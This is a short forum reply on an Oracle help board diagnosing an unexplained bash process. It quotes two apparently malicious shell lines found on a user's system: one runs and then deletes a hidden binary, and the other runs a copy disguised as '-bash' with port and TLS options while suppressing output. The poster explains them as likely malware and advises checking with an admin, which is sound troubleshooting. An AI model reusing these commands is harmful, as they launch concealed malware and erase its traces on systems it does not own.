Posted by ErmanArslansOracleBlog on May 10, 2024; 8:46am
URL: http://erman-arslan-s-oracle-forum.124.s1.nabble.com/Auto-Generating-bash-process-tp12438p12500.html

Okay.. Well...

---
cp -f -r --  /bin/klibsystem5 2>/dev/null && /bin/klibsystem5 >/dev/null 2>&1 && rm -rf -- /bin/klibsystem5 2>/dev/null
cp -f -r -- /tmp/.pwn/bprofr /tmp/-bash 2>/dev/null && /tmp/-bash -c  -p 80 -p 8080 -p 443 -tls  -dp 80 -dp 8080 -dp 443 -tls  -d >/dev/null 2>&1 && rm -rf -- /tmp/-bash 2>/dev/null
----

the first command ->  copies a system file (klibsystem5), potentially executes it (with unknown effects),
hides any errors, and then deletes the original file. This is highly likely to damage your system.

the second command ->  copies a potentially malicious program (.pwn/bprofr) from the temporary directory, renames it to a hidden file (-bash) that looks like the standard bash shell program, tries to run it with port forwarding options, hides any output, and then deletes the copied program.  This executes a bash!! --THIS MAY BE THE CAUSE!

so these may cause the problem.. Speak with your OS admin about these.. Comment them if it is okay (they seem like malware(s), kill that problematic bash, and see whether or not this fixes your issue.